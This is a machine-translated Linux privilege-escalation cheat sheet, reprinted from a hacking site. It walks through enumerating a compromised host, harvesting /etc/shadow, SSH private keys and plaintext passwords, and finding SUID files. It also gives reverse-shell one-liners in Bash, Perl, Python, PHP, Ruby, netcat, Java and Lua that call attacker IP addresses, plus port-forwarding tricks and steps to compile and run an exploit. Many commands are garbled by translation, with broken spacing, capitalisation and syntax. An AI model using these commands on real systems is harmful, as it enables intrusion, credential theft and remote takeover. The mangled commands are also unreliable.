The common command set for Linux to raise weights

Reprint: http://www.myhack58.com/Article/html/3/8/2017/83236.htm0x00 Operating system related

Operating system Type version

1. Cat/etc/issue
2. Cat/etc/*-release
3. Cat/etc/lsb-release # Debian
4. Cat/etc/redhat-release # Redhat

Kernel version, whether it is 64-bit

1. Cat/proc/version
2. Uname-a
3. Uname-mrs
4. Rpm-q kernel
5. DMESG | grep Linux
6. Ls/boot | grep vmlinuz-

Environment variables

1. Cat/etc/profile
2. Cat/etc/bashrc
3. Cat ~/.bash_profile
4. Cat ~/.BASHRC
5. Cat ~/.bash_logout
6. Env
7. Set

See if a printer is available

1. Lpstat-a

0X01 Applications related to services

View running programs and their corresponding user rights

1. PS aux
2. Ps-ef
3. Top
4. Cat/etc/services

A process running with root privileges

1. PS aux | grep root
2. Ps-ef | grep root

View installed Apps

1. ls-alh/usr/bin/
2. ls-alh/sbin/
3. Dpkg-l
4. Rpm-qa
5. Ls-alh/var/cache/apt/archives
6. ls-alh/var/cache/yum/

Configuration files for some services

1. Cat/etc/syslog.conf
2. Cat/etc/chttp.conf
3. Cat/etc/lighttpd.conf
4. Cat/etc/cups/cupsd.conf
5. Cat/etc/inetd.conf
6. Cat/etc/apache2/apache2.conf
7. Cat/etc/my.conf
8. Cat/etc/httpd/conf/httpd.conf
9. Cat/opt/lampp/etc/httpd.conf
10. ls-arl/etc/| awk ' $ ~/^.*r.*/'

Scheduled Tasks

1. Crontab-l
2. Ls-alh/var/spool/cron
3. ls-al/etc/| grep cron
4. ls-al/etc/cron*
5. cat/etc/cron*
6. Cat/etc/at.allow
7. Cat/etc/at.deny
8. Cat/etc/cron.allow
9. Cat/etc/cron.deny
10. Cat/etc/crontab
11. Cat/etc/anacrontab
12. Cat/var/spool/cron/crontabs/root

Find the stored plaintext user name, password

1. Grep-i user [filename]
2. Grep-i pass [filename]
3. Grep-c 5 "Password" [filename]
4. Find. -name "*.php"-print0 | xargs-0 grep-i-N "var $password" # Joomla

0X02 Communication and network related

View current network Address

1. /sbin/ifconfig-a
2. Cat/etc/network/interfaces
3. Cat/etc/sysconfig/network

View network configuration, DNS,DHCP, gateways

1. Cat/etc/resolv.conf
2. Cat/etc/sysconfig/network
3. Cat/etc/networks
4. Iptables-l
5. Hostname
6. DnsDomainName

View network traffic

1. Lsof-i
2. Lsof-i: 80
3. grep 80/etc/services
4. Netstat-antup
5. Netstat-antpx
6. Netstat-tulpn
7. Chkconfig--list
8. Chkconfig--list | grep 3:on
9. Last
10. W

View Cache

1. Arp-e
2. Route
3. /sbin/route-nee

Tcpdump

1. Tcpdump TCP DST 192.168.1.7 and TCP DST 10.2.2.222 21

tcpdump TCP DST [IP] [port] and TCP DST [IP] [port]

Interactive shell

Bash version:

1. Bash-i >&/dev/tcp/10.0.0.1/8080 0>&1

Perl version:

1. Perl-e ' use Socket; $i = "10.0.0.1"; $p =1234;socket (S,pf_inet,sock_stream,getprotobyname ("TCP")); if (Connect (S), Sockaddr_in ($p, Inet_aton ($i))) {Open (STDIN, ">&s"), open (STDOUT, ">&s"), open (STDERR, ">&s"); EXEC ("/bin/sh-i");}; '

Python version:

1. Python-c ' Import socket,subprocess,os;s=socket.socket (socket.af_inet,socket. SOCK_STREAM); S.connect (("10.0.0.1", 1234)); Os.dup2 (S.fileno (), 0); Os.dup2 (S.fileno (), 1); Os.dup2 (S.fileno (), 2);p =subprocess.call (["/bin/sh", "-I"]); '

PHP Version:

1. Php-r ' $sock =fsockopen ("10.0.0.1", 1234); EXEC ("/bin/sh-i <&3 >&3 2>&3"); '

Ruby version:

1. Ruby-rsocket-e ' F=tcpsocket.open ("10.0.0.1", 1234). To_i;exec sprintf ("/bin/sh-i <&%d >&%d 2>&%d ", F,f,f) '

NC Version:

1. NC-E/bin/sh 223.8.200.234 1234

NC does not use-e:

1. Mknod/tmp/backpipe P
2. /bin/sh 0</tmp/backpipe | NC attackerip Listenport 1>/tmp/backpipe

Mknod

1. Mknod backpipe P && telnet 173.214.173.151 8080 0backpipe

Java version:

1. R = Runtime.getruntime ()
2. p = r.exec (["/bin/bash", "-C", "Exec 5<>/dev/tcp/202.103.243.122/2002;cat <&5 | and" read line; do \ $line 2&G T;&5 >&5; Done "] as string[])
3. P.waitfor ()

LUA version:

1. Lua-e "require (' socket '); require (' OS '); t=socket.tcp (); T:connect (' 202.103.243.122 ', ' 1234 '); Os.execute ('/bin/sh-i <&3 >&3 2>&3 '); "

Port forwarding

LCX-<listen|tran|slave>

1. Lcx-listen 4567 33891 #Attacker
2. Lcx-slave 111.222.333.444 4567 127.0.0.1 3389 # on the targets

SSH-[L/R] [local port]:[remote ip]:[remote Port] [local user]@[local IP]

1. Ssh-l 8080:127.0.0.1:80 [email protected] # Local Port
2. Ssh-r 8080:127.0.0.1:80 [email protected] # Remote Port

Mknod Backpipe p; NC-L-P [remote port] < Backpipe | NC [local IP] [local port] >backpipe

1. Mknod Backpipe p; Nc-l-P 8080 < Backpipe | NC 10.1.1.251 >backpipe
2. Mknod Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow 1>backpipe # Proxy (Port 8080)
3. Mknod Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow & 1>backpipe # Proxy Monitor (Port 8080)

Tunnel

1. Ssh-d 127.0.0.1:9050-n [Username]@[ip]
2. Proxychains ifconfig

0X03 User-related

User Information

1. Id
2. W.H.O.
3. W
4. Last
5. cat/etc/passwd
6. Cat/etc/group
7. Cat/etc/shadow
8. ls-alh/var/mail/
9. Grep-v-E "^#"/etc/passwd | Awk-f: ' $ = = 0 {print '} ' # list super users
10. Awk-f: ' ($ = = "0") {print} '/etc/passwd #列出超级用户
11. Cat/etc/sudoers
12. Sudo-l

List of home directories

1. ls-ahlr/root/
2. ls-ahlr/home/

Find the password from the configuration file

1. Cat/var/apache2/config.inc
2. Cat/var/lib/mysql/mysql/user. MYD
3. Cat/root/anaconda-ks.cfg

See other user's action record

1. Cat ~/.bash_history
2. Cat ~/.nano_history
3. Cat ~/.atftp_history
4. Cat ~/.mysql_history
5. Cat ~/.php_history

SSH private key

1. Cat ~/.ssh/authorized_keys
2. Cat ~/.ssh/identity.pub
3. Cat ~/.ssh/identity
4. Cat ~/.ssh/id_rsa.pub
5. Cat ~/.ssh/id_rsa
6. Cat ~/.ssh/id_dsa.pub
7. Cat ~/.SSH/ID_DSA
8. Cat/etc/ssh/ssh_config
9. Cat/etc/ssh/sshd_config
10. Cat/etc/ssh/ssh_host_dsa_key.pub
11. Cat/etc/ssh/ssh_host_dsa_key
12. Cat/etc/ssh/ssh_host_rsa_key.pub
13. Cat/etc/ssh/ssh_host_rsa_key
14. Cat/etc/ssh/ssh_host_key.pub
15. Cat/etc/ssh/ssh_host_key

0x04 File System Related

/etc/Directory below file

1. ls-arl/etc/| awk ' $ ~/^.*w.*/' 2>/dev/null # anyone
2. ls-arl/etc/| awk ' $ ~/^. w/' 2>/dev/null # Owner
3. ls-arl/etc/| awk ' $ ~/^.....w/' 2>/dev/null # Group
4. ls-arl/etc/| awk ' $ ~/w.$/' 2>/dev/null # Other
6. find/etc/-readable-type F 2>/dev/null # anyone
7. find/etc/-readable-type f-maxdepth 1 2>/dev/null # anyone

Log file

1. Ls-alh/var/log
2. Ls-alh/var/mail
3. Ls-alh/var/spool
4. Ls-alh/var/spool/lpd
5. Ls-alh/var/lib/pgsql
6. Ls-alh/var/lib/mysql
7. Cat/var/lib/dhcp3/dhclient.leases

View Web site Files

1. ls-alhr/var/www/
2. ls-alhr/srv/www/htdocs/
3. ls-alhr/usr/local/www/apache22/data/
4. ls-alhr/opt/lampp/htdocs/
5. ls-alhr/var/www/html/

Common Log files

2. Cat/etc/httpd/logs/access_log
4. Cat/etc/httpd/logs/access.log
6. Cat/etc/httpd/logs/error_log
8. Cat/etc/httpd/logs/error.log
10. Cat/var/log/apache2/access_log
12. Cat/var/log/apache2/access.log
14. Cat/var/log/apache2/error_log
16. Cat/var/log/apache2/error.log
18. Cat/var/log/apache/access_log
20. Cat/var/log/apache/access.log
22. Cat/var/log/auth.log
24. Cat/var/log/chttp.log
26. Cat/var/log/cups/error_log
28. Cat/var/log/dpkg.log
30. Cat/var/log/faillog
32. Cat/var/log/httpd/access_log
34. Cat/var/log/httpd/access.log
36. Cat/var/log/httpd/error_log
38. Cat/var/log/httpd/error.log
40. Cat/var/log/lastlog
42. Cat/var/log/lighttpd/access.log
44. Cat/var/log/lighttpd/error.log
46. Cat/var/log/lighttpd/lighttpd.access.log
48. Cat/var/log/lighttpd/lighttpd.error.log
50. Cat/var/log/messages
52. Cat/var/log/secure
54. Cat/var/log/syslog
56. Cat/var/log/wtmp
58. Cat/var/log/xferlog
60. Cat/var/log/yum.log
62. Cat/var/run/utmp
64. Cat/var/webmin/miniserv.log
66. Cat/var/www/logs/access_log
68. Cat/var/www/logs/access.log
70. ls-alh/var/lib/dhcp3/
72. ls-alh/var/log/postgresql/
74. ls-alh/var/log/proftpd/
76. ls-alh/var/log/samba/

File mount

1. Mount
2. Df-h
3. Cat/etc/fstab

Find command

1. Find/-perm-1000-type D 2>/dev/null # Only the directory owner can change the delete
2. Find/-perm-g=s-type F 2>/dev/null # SGID (chmod)-run as the group, not the user who started it.
3. Find/-perm-u=s-type F 2>/dev/null # SUID (chmod 4000)-run as the owner, not the user who started it.
5. Find/-perm-g=s-o-perm-u=s-type F 2>/dev/null # SGID or SUID
6. For i in ' locate-r ' bin$ "'; Do find $i \ (-perm-4000-o-perm-2000 \)-type F 2>/dev/null; Done # from the following locations:/bin,/sbin,/usr/bin,/usr/sbin,/usr/local/bin,/usr/local/sbin or other bin directories looking for
8. Find/-perm-g=s-o-perm-4000! -type l-maxdepth 3-exec ls-ld {} \; 2>/dev/null #从/,sgud or suid to find, exclude symbolic links, depth of 3 folders, display a detailed list and remove error messages

Find a writable directory

1. Find/-writable-type D 2>/dev/null # writable Directory
2. Find/-perm-222-type D 2>/dev/null # writable Directory
3. Find/-perm-o w-type d 2>/dev/null # writable Directory
5. Find/-perm-o x-type d 2>/dev/null # executable directory
7. Find/\ (-perm-o w-perm-o x \)-type d 2>/dev/null # writable executable
8. Directory

Find Files

1. Find/-xdev-type d \ (-perm-0002-a!-perm-1000 \)-print 2>/dev/null # writable file
2. Find/dir-xdev \ (-nouser-o-nogroup \)-print 2>/dev/null # no owner file

0x05 Preparation and attack

View language Support

1. Find/-name perl*
2. Find/-name python*
3. Find/-name gcc*
4. Find/-name cc

View Upload Method

1. Find/-name wget
2. Find/-name nc*
3. Find/-name netcat*
4. Find/-name tftp*
5. Find/-name FTP

Find EXP
Http://www.exploit-db.com
Http://1337day.com
Http://www.securiteam.com
Http://www.securityfocus.com
Http://www.exploitsearch.net
http://metasploit.com/modules/
Http://securityreason.com
Http://seclists.org/fulldisclosure/
http://www.google.com

Compiling exp

1. which GCC
2. GCC exp.c-o Exp

Run

1. CHMOD +x Exp
2. ./exp

0X06 Power Assist Script

LineNum

linuxprivchecker.py

Not all of the above, there may be any errors, please make a big correction or supplement. Learn to communicate.

The common command set for Linux to raise weights